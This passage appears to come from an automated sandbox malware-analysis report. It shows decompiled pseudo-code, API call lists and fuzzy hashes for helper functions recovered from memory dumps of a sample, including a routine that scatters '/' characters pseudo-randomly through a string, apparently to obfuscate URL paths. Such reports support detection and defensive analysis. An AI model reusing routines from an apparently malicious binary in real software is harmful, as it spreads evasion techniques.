							_t31 = WaitForSingleObject(_t25, 0x4e20);
							if(_t31 == 0) {
								goto L19;
							}
						}
					}
					goto L11;
				} else {
					L11:
					_t27 = _a8;
					if(_t27 != 0) {
						 *_t27 =  *_t27 | 0x00000001;
					}
					_t31 = E030851A8(_t32, _t26);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t27 != 0 && _t31 != 0) {
						 *_t27 =  *_t27 & 0xfffffffe;
					}
					L19:
					if(_t25 != 0) {
						CloseHandle(_t25);
					}
					L21:
					return _t31;
				}
			}

0x030873c4
0x030873cb
0x030873d5
0x030873d9
0x030873df
0x030873ec
0x030873f3
0x030873f7
0x03087409
0x0308740b
0x0308740b
0x03087410
0x03087417
0x03087422
0x03087438
0x0308743c
0x0308743e
0x03087443
0x03087443
0x03087450
0x03087454
0x03087458
0x00000000
0x00000000
0x03087466
0x0308746a
0x00000000
0x00000000
0x0308746a
0x03087454
0x00000000
0x0308746c
0x0308746c
0x0308746c
0x03087472
0x03087474
0x03087474
0x0308747e
0x03087482
0x03087494
0x03087494
0x03087498
0x0308749e
0x0308749e
0x030874a1
0x030874a3
0x030874a6
0x030874a6
0x030874ad
0x030874b3
0x030874b3

APIs

Part of subcall function 03082DEA: lstrlen.KERNEL32(E8FA7DD7,00000000,63699BC3,00000027,00000000,05BB9C98,7742C740,030855DE,?,63699BC3,E8FA7DD7,00000000,?,?,?,030855DE), ref: 03082E20
Part of subcall function 03082DEA: lstrcpy.KERNEL32(00000000,00000000), ref: 03082E44
Part of subcall function 03082DEA: lstrcat.KERNEL32(00000000,00000000), ref: 03082E4C

CreateEventA.KERNEL32(0308A2F8,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,030830E1,?,?,?), ref: 03087402

Part of subcall function 030850CA: RtlFreeHeap.NTDLL(00000000,00000000,03084239,00000000,00000001,?,00000000,?,?,?,03086B8D,00000000,?,00000001), ref: 030850D6

WaitForSingleObject.KERNEL32(00000000,00004E20,030830E1,00000000,?,00000000,?,030830E1,?,?,?,?,?,?,?,0308211B), ref: 03087460
WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,030830E1,?,?,?), ref: 0308748E
CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,030830E1,?,?,?), ref: 030874A6

Memory Dump Source

Source File: 00000004.00000002.472072456.0000000003081000.00000020.00000001.sdmp, Offset: 03080000, based on PE: true

Associated: 00000004.00000002.472055038.0000000003080000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472097788.0000000003089000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.472108010.000000000308A000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472122190.000000000308C000.00000002.00000001.sdmp Download File

Similarity

API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
String ID:
API String ID: 73268831-0
Opcode ID: 175c619d4f48e8d3e1f6b77903bd91b2bb37d5b1c4d4f8e80ce4097b05887e0a
Instruction ID: 550eff87f470abc37687758c2ce29de7ad3aed5c8b99254eccb247148dac4683
Opcode Fuzzy Hash: 175c619d4f48e8d3e1f6b77903bd91b2bb37d5b1c4d4f8e80ce4097b05887e0a
Instruction Fuzzy Hash: 5F21F6326033225BD771FB688C44B9BBAE8AB85F20F291625FEC19B649DB74D8008650

Uniqueness

Uniqueness Score: -1.00%

Function 03083032, Relevance: 6.1, APIs: 4, Instructions: 87
sleepCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E03083032(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E03086710(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E030815B9(_t23);
						}
					}
					return _t38;
				}
				if(E03084C8C(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x308a2f8, 1, 0,  *0x308a394);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E03084039(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E03081D57(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E03083C84(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E030873C3( &_v32, _t39);
					goto L13;
				}
			}

0x03083032
0x0308303f
0x03083045
0x03083046
0x03083047
0x03083048
0x03083049
0x0308304d
0x03083059
0x0308305d
0x030830e5
0x030830e5
0x030830e8
0x030830ea
0x030830f2
0x030830f8
0x030830fb
0x030830fb
0x030830f8
0x03083106
0x03083106
0x03083070
0x03083072
0x03083072
0x03083089
0x0308308d
0x03083090
0x0308309b
0x030830a2
0x030830a2
0x030830ae
0x030830af
0x030830bd
0x030830b1
0x030830b1
0x030830b2
0x030830b3
0x030830b4
0x030830b5
0x030830b6
0x030830b6
0x030830c2
0x030830c7
0x030830c9
0x030830cb
0x030830cb
0x030830d2
0x00000000
0x030830d4
0x030830d4
0x030830e1
0x00000000
0x030830e1

APIs

CreateEventA.KERNEL32(0308A2F8,00000001,00000000,00000040,?,?,74B5F710,00000000,74B5F730,?,?,?,?,0308211B,?,00000001), ref: 03083083
SetEvent.KERNEL32(00000000,?,?,?,?,0308211B,?,00000001,0308560C,00000002,?,?,0308560C), ref: 03083090
Sleep.KERNEL32(00000BB8,?,?,?,?,0308211B,?,00000001,0308560C,00000002,?,?,0308560C), ref: 0308309B
CloseHandle.KERNEL32(00000000,?,?,?,?,0308211B,?,00000001,0308560C,00000002,?,?,0308560C), ref: 030830A2

Part of subcall function 03084039: WaitForSingleObject.KERNEL32(00000000,?,?,?,030830C2,?,030830C2,?,?,?,?,?,030830C2,?), ref: 03084113
Part of subcall function 03084039: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,030830C2,?,?,?,?,?,0308211B,?), ref: 0308413B

Memory Dump Source

Source File: 00000004.00000002.472072456.0000000003081000.00000020.00000001.sdmp, Offset: 03080000, based on PE: true

Associated: 00000004.00000002.472055038.0000000003080000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472097788.0000000003089000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.472108010.000000000308A000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472122190.000000000308C000.00000002.00000001.sdmp Download File

Similarity

API ID: CloseEvent$CreateHandleObjectSingleSleepWait
String ID:
API String ID: 467273019-0
Opcode ID: 7e019b70b59f45ce880b0e9c0f66c64b39e6e9fe8c050e1ef95270bd611ac1ff
Instruction ID: ee6c634642db14a5d50b95b72368e0faa30e45606da0e0972ad1d132eaf71a33
Opcode Fuzzy Hash: 7e019b70b59f45ce880b0e9c0f66c64b39e6e9fe8c050e1ef95270bd611ac1ff
Instruction Fuzzy Hash: B821B67E902218ABCB10FFE488849EEB7ADAF84A50B054465E9D1E7100DB35D9458FA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DB54F, Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 6E1DC15D: _free.LIBCMT ref: 6E1DC16B

Part of subcall function 6E1DD365: WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,00000000,7FFFFFFF,?,00000001,?,00000000,0000FFFF,?,6E1D6714,?,00000000,?), ref: 6E1DD407

GetLastError.KERNEL32 ref: 6E1DB5B7
__dosmaperr.LIBCMT ref: 6E1DB5BE
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6E1DB5FD
__dosmaperr.LIBCMT ref: 6E1DB604

Memory Dump Source

Source File: 00000004.00000002.476211742.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: 3d845d838bb3072a2a996eac4e635f7c83e45ef1882279831f088dc7681c6663
Instruction ID: 3eb17d9623b793b09a1c853465148f9af1c5cf8f56afce41f3b136a44851d8fd
Opcode Fuzzy Hash: 3d845d838bb3072a2a996eac4e635f7c83e45ef1882279831f088dc7681c6663
Instruction Fuzzy Hash: 4E2198B1604615FFDB119FE68C80C5777ADEF553A87108A24F52AD7194D730ECC8ABA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DE226, Relevance: 6.1, APIs: 4, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.476211742.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2c1b250ccd2dbd4e06afb2022931430693c7293d59feee33e7ec191041211d3
Instruction ID: 87c5dccd91b3f87284a4f0b1925a83e9aad684a5f2d9d4cab63f44a525424e54
Opcode Fuzzy Hash: f2c1b250ccd2dbd4e06afb2022931430693c7293d59feee33e7ec191041211d3
Instruction Fuzzy Hash: 4B215732D05621EBDB128AE9CC44F4BB379AF22761F210521ED15A7280D730EE48E6E0

Uniqueness

Uniqueness Score: -1.00%

Function 03084D09, Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E03084D09(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E03086837(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}

0x03084d15
0x03084d19
0x03084d1a
0x03084d1b
0x03084d1d
0x03084d1f
0x03084d24
0x03084d27
0x03084dbe
0x03084dc5
0x03084dc5
0x03084d30
0x03084d37
0x03084d47
0x03084d47
0x03084d4d
0x03084d4f
0x03084d54
0x03084d5d
0x03084d65
0x03084d68
0x03084d73
0x03084d77
0x03084d79
0x03084d7a
0x03084d83
0x03084d87
0x03084d98
0x03084d89
0x03084d8e
0x03084d93
0x03084da2
0x03084da2
0x03084d77
0x03084da8
0x03084dae
0x03084dae
0x03084db7
0x03084dbc
0x03084dbc
0x00000000

APIs

Sleep.KERNEL32(000000C8), ref: 03084D37
lstrlenW.KERNEL32(?), ref: 03084D6D
memcpy.NTDLL(00000000,?,00000000,00000000), ref: 03084D8E
SysFreeString.OLEAUT32(?), ref: 03084DA2

Memory Dump Source

Source File: 00000004.00000002.472072456.0000000003081000.00000020.00000001.sdmp, Offset: 03080000, based on PE: true

Associated: 00000004.00000002.472055038.0000000003080000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472097788.0000000003089000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.472108010.000000000308A000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472122190.000000000308C000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeSleepStringlstrlenmemcpy
String ID:
API String ID: 1198164300-0
Opcode ID: b2590973eb000b854aa6685a29de0ddbe923270f23fc674fbbbbf2161666ca2c
Instruction ID: fc69b16d8daf0317489881eb8f2048c04ab0d0670ce2f1f06ff818f795327805
Opcode Fuzzy Hash: b2590973eb000b854aa6685a29de0ddbe923270f23fc674fbbbbf2161666ca2c
Instruction Fuzzy Hash: 8021607990231AEFCB10EFA5C8849DEBBF8FF48315B1181A9E985D7200E734DA00CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D7990, Relevance: 6.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,0000FFFF,00000004,6E1C2130,0000FFFF,?,0000FFFF,?,6E1D665B,00000000,0000FFFF,?,?,00000000,?), ref: 6E1D7995
_free.LIBCMT ref: 6E1D79F2
_free.LIBCMT ref: 6E1D7A28
SetLastError.KERNEL32(00000000,6E27E108,000000FF,?,6E1D665B,00000000,0000FFFF,?,?,00000000,?), ref: 6E1D7A33

Memory Dump Source

Source File: 00000004.00000002.476211742.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: dcba122910d3b8936c9432e61d6a37a6795cce4bddea3420a560e5787925b2e2
Instruction ID: 905cd6171588737b4df37ef71a9d593410af362c326efa908d15f7126e46b33f
Opcode Fuzzy Hash: dcba122910d3b8936c9432e61d6a37a6795cce4bddea3420a560e5787925b2e2
Instruction Fuzzy Hash: 2F11E3332089116BEA4155F98C88DDB215EDBE2679B35062AF535D71C0EF618CCDE131

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D7AE7, Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,6E1D550A,6E1C8408,6E1BE215), ref: 6E1D7AEC
_free.LIBCMT ref: 6E1D7B49
_free.LIBCMT ref: 6E1D7B7F
SetLastError.KERNEL32(00000000,6E27E108,000000FF,?,?,?,6E1D550A,6E1C8408,6E1BE215), ref: 6E1D7B8A

Memory Dump Source

Source File: 00000004.00000002.476211742.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 3d22699719de3b85fb391ed1f5bd33bd90ba215f20e5cecd6eb59979f3537939
Instruction ID: 80dc40f7f931f0bd72e9a011ae3aa6e891535f4b2cc043d7d755eaa544e763a9
Opcode Fuzzy Hash: 3d22699719de3b85fb391ed1f5bd33bd90ba215f20e5cecd6eb59979f3537939
Instruction Fuzzy Hash: F911C232208A156AEE4195F9DC89D9A355EEBE2679B250A3AF534D71C0DF218CCDE130

Uniqueness

Uniqueness Score: -1.00%

Function 030852E5, Relevance: 6.1, APIs: 4, Instructions: 61
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E030852E5(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x308a290, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x308a2a8; // 0x5e9101b8
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x308a2a8 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

0x030852ed
0x030852f0
0x030852f6
0x0308530e
0x03085312
0x03085315
0x03085317
0x0308531a
0x0308531c
0x0308531f
0x03085321
0x03085321
0x03085323
0x0308532e
0x03085333
0x03085344
0x0308534c
0x03085351
0x03085354
0x03085357
0x03085359
0x0308535f
0x03085362
0x03085362
0x03085362
0x0308536d
0x03085372
0x0308537c

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,030862E0,00000000,?,00000000,030870D9,00000000,05BB9630), ref: 030852F0
RtlAllocateHeap.NTDLL(00000000,?), ref: 03085308
memcpy.NTDLL(00000000,05BB9630,-00000008,?,?,?,030862E0,00000000,?,00000000,030870D9,00000000,05BB9630), ref: 0308534C
memcpy.NTDLL(00000001,05BB9630,00000001,030870D9,00000000,05BB9630), ref: 0308536D

Memory Dump Source

Source File: 00000004.00000002.472072456.0000000003081000.00000020.00000001.sdmp, Offset: 03080000, based on PE: true

Associated: 00000004.00000002.472055038.0000000003080000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472097788.0000000003089000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.472108010.000000000308A000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472122190.000000000308C000.00000002.00000001.sdmp Download File

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: 90f8380cf1529f54196785475bf8487f8fbd3767ff4549c29a805d4b06785eb0
Instruction ID: b2f2b780fd9165a148e7bfcb7c87d1364e097e3798036b2baf18546eb46eb61a
Opcode Fuzzy Hash: 90f8380cf1529f54196785475bf8487f8fbd3767ff4549c29a805d4b06785eb0
Instruction Fuzzy Hash: 88112C72A01214BFC710EF69DC84D9EBFFDDB81250B190176F545D7150E6759900C790

Uniqueness

Uniqueness Score: -1.00%

Function 0308578C, Relevance: 6.1, APIs: 4, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0308578C(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
				_t12 = E03086837(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0x30892a4);
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
							 *_t24 = 0;
							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0x30892a4);
						}
						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
				}
				return 0;
			}

0x03085797
0x0308579b
0x0308579d
0x0308579e
0x030857a6
0x030857a6
0x030857aa
0x00000000
0x00000000
0x030857a1
0x030857a2
0x030857a5
0x030857a5
0x030857b2
0x030857b9
0x030857bd
0x030857c5
0x030857cb
0x030857cd
0x030857d2
0x030857d6
0x030857d8
0x030857db
0x030857e2
0x030857e2
0x030857ec
0x030857ef
0x030857f2
0x030857f2
0x030857fe
0x030857fe
0x0308580b

APIs

StrChrA.SHLWAPI(?,00000020,00000000,05BB962C,?,?,?,03081128,05BB962C,?,?,030855D3), ref: 030857A6
StrTrimA.SHLWAPI(?,030892A4,00000002,?,?,?,03081128,05BB962C,?,?,030855D3), ref: 030857C5
StrChrA.SHLWAPI(?,00000020,?,?,?,03081128,05BB962C,?,?,030855D3,?,?,?,?,?,03086BD8), ref: 030857D0
StrTrimA.SHLWAPI(00000001,030892A4,?,?,?,03081128,05BB962C,?,?,030855D3,?,?,?,?,?,03086BD8), ref: 030857E2

Memory Dump Source

Source File: 00000004.00000002.472072456.0000000003081000.00000020.00000001.sdmp, Offset: 03080000, based on PE: true

Associated: 00000004.00000002.472055038.0000000003080000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472097788.0000000003089000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.472108010.000000000308A000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472122190.000000000308C000.00000002.00000001.sdmp Download File

Similarity

API ID: Trim
String ID:
API String ID: 3043112668-0
Opcode ID: e381596b5cf2c7e6088146b2531799441e9875d8bf31d9c15898e10b7aba1965
Instruction ID: 0c5e034f1e22a31208131bcc3e5c48ee4e044211a00bcb304b1a3868d8fc3f72
Opcode Fuzzy Hash: e381596b5cf2c7e6088146b2531799441e9875d8bf31d9c15898e10b7aba1965
Instruction Fuzzy Hash: 5201F5716023259FD321EF199C09E2BBBDCEF87A90F110919F9C1D7240DB74C80186A0

Uniqueness

Uniqueness Score: -1.00%

Function 03085076, Relevance: 6.0, APIs: 4, Instructions: 29
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E03085076() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x308a2c4; // 0x2dc
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x308a308; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x308a2c4; // 0x2dc
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x308a290; // 0x57c0000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}

0x03085076
0x0308507d
0x030850c7
0x030850c9
0x030850c9
0x03085081
0x03085087
0x0308508c
0x03085090
0x03085096
0x0308509d
0x00000000
0x00000000
0x0308509f
0x030850a4
0x00000000
0x00000000
0x00000000
0x030850a4
0x030850a6
0x030850ae
0x030850b1
0x030850b1
0x030850b7
0x030850be
0x030850c1
0x030850c1
0x00000000

APIs

SetEvent.KERNEL32(000002DC,00000001,030856C9), ref: 03085081
SleepEx.KERNEL32(00000064,00000001), ref: 03085090
CloseHandle.KERNEL32(000002DC), ref: 030850B1
HeapDestroy.KERNEL32(057C0000), ref: 030850C1

Memory Dump Source

Source File: 00000004.00000002.472072456.0000000003081000.00000020.00000001.sdmp, Offset: 03080000, based on PE: true

Associated: 00000004.00000002.472055038.0000000003080000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472097788.0000000003089000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.472108010.000000000308A000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472122190.000000000308C000.00000002.00000001.sdmp Download File

Similarity

API ID: CloseDestroyEventHandleHeapSleep
String ID:
API String ID: 4109453060-0
Opcode ID: b7bb676ff686edf928bbd8a391921c99c94aee07196f8dafc2ae595f7d170d28
Instruction ID: 9fa34d7ee542f853824c5f979ac3d994700bb5a36cd9b7c63d6176cc97a93b77
Opcode Fuzzy Hash: b7bb676ff686edf928bbd8a391921c99c94aee07196f8dafc2ae595f7d170d28
Instruction Fuzzy Hash: C6F03031B033119FDB30BB789C4CB6A77E8AB05B21B080115BCC5D7588CB2DD8048D90

Uniqueness

Uniqueness Score: -1.00%

Function 030810DD, Relevance: 6.0, APIs: 4, Instructions: 29
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E030810DD(void** __esi) {
				char* _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0x308a37c; // 0x5bb9630
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x308a37c; // 0x5bb9630
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0x308a030) {
					HeapFree( *0x308a290, 0, _t8);
				}
				_t14[1] = E0308578C(_v0, _t14);
				_t11 =  *0x308a37c; // 0x5bb9630
				_t12 = _t11 + 0x40;
				__imp__(_t12);
				return _t12;
			}

0x030810dd
0x030810dd
0x030810e6
0x030810f6
0x030810f6
0x030810fb
0x03081100
0x00000000
0x00000000
0x030810f0
0x030810f0
0x03081102
0x03081106
0x03081118
0x03081118
0x03081128
0x0308112b
0x03081130
0x03081134
0x0308113a

APIs

RtlEnterCriticalSection.NTDLL(05BB95F0), ref: 030810E6
Sleep.KERNEL32(0000000A,?,?,030855D3,?,?,?,?,?,03086BD8,?,00000001), ref: 030810F0
HeapFree.KERNEL32(00000000,00000000,?,?,030855D3,?,?,?,?,?,03086BD8,?,00000001), ref: 03081118
RtlLeaveCriticalSection.NTDLL(05BB95F0), ref: 03081134

Memory Dump Source

Source File: 00000004.00000002.472072456.0000000003081000.00000020.00000001.sdmp, Offset: 03080000, based on PE: true

Associated: 00000004.00000002.472055038.0000000003080000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472097788.0000000003089000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.472108010.000000000308A000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472122190.000000000308C000.00000002.00000001.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: dfcfdbd0ee9deaeb06552c5ebef388fdc8daff664a3dd0d2a3e481b864f243eb
Instruction ID: 1ad28473fd55fa0212c10c81e242f14a2649db30516e3b867e70731b0bb03dc2
Opcode Fuzzy Hash: dfcfdbd0ee9deaeb06552c5ebef388fdc8daff664a3dd0d2a3e481b864f243eb
Instruction Fuzzy Hash: ADF0DA743032409FDB25FB69ED49F1A77E8AF04740B048416FAC5DB655C728D801CF29

Uniqueness

Uniqueness Score: -1.00%

Function 6E1ECEDC, Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,6E1EC5B1,00000000,00000001,00000000,00000000,?,6E1E609F,00000000,?,00000000), ref: 6E1ECEF3
GetLastError.KERNEL32(?,6E1EC5B1,00000000,00000001,00000000,00000000,?,6E1E609F,00000000,?,00000000,00000000,00000000,?,6E1E6604,00000020), ref: 6E1ECEFF

Part of subcall function 6E1ECEC5: CloseHandle.KERNEL32(6E27E8A0,6E1ECF0F,?,6E1EC5B1,00000000,00000001,00000000,00000000,?,6E1E609F,00000000,?,00000000,00000000,00000000), ref: 6E1ECED5

___initconout.LIBCMT ref: 6E1ECF0F

Part of subcall function 6E1ECE87: CreateFileW.KERNEL32(6E248A58,40000000,00000003,00000000,00000003,00000000,00000000,6E1ECEB6,6E1EC59E,00000000,?,6E1E609F,00000000,?,00000000,00000000), ref: 6E1ECE9A

WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,6E1EC5B1,00000000,00000001,00000000,00000000,?,6E1E609F,00000000,?,00000000,00000000), ref: 6E1ECF24

Memory Dump Source

Source File: 00000004.00000002.476211742.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 9c2b45210cdd590a19f3d0c82ab28f4a62c34f950b6947fd39438f2c34fb7828
Instruction ID: cfc767f5b64cee28b415d6ca9c11b3d07a1c97d2c382ba9808c35f83e0b1e514
Opcode Fuzzy Hash: 9c2b45210cdd590a19f3d0c82ab28f4a62c34f950b6947fd39438f2c34fb7828
Instruction Fuzzy Hash: A4F0A237501968BBCF176FE5CC089DA3FA7EB197A5B544414FA189A520C7718860EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 030850DF, Relevance: 6.0, APIs: 4, Instructions: 28
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E030850DF() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x308a37c; // 0x5bb9630
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x308a37c; // 0x5bb9630
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x308a37c; // 0x5bb9630
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x308b83e) {
					HeapFree( *0x308a290, 0, _t10);
					_t7 =  *0x308a37c; // 0x5bb9630
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}

0x030850df
0x030850e8
0x030850f8
0x030850f8
0x030850fd
0x03085102
0x00000000
0x00000000
0x030850f2
0x030850f2
0x03085104
0x03085109
0x0308510d
0x03085120
0x03085126
0x03085126
0x0308512f
0x03085131
0x03085135
0x0308513b

APIs

RtlEnterCriticalSection.NTDLL(05BB95F0), ref: 030850E8
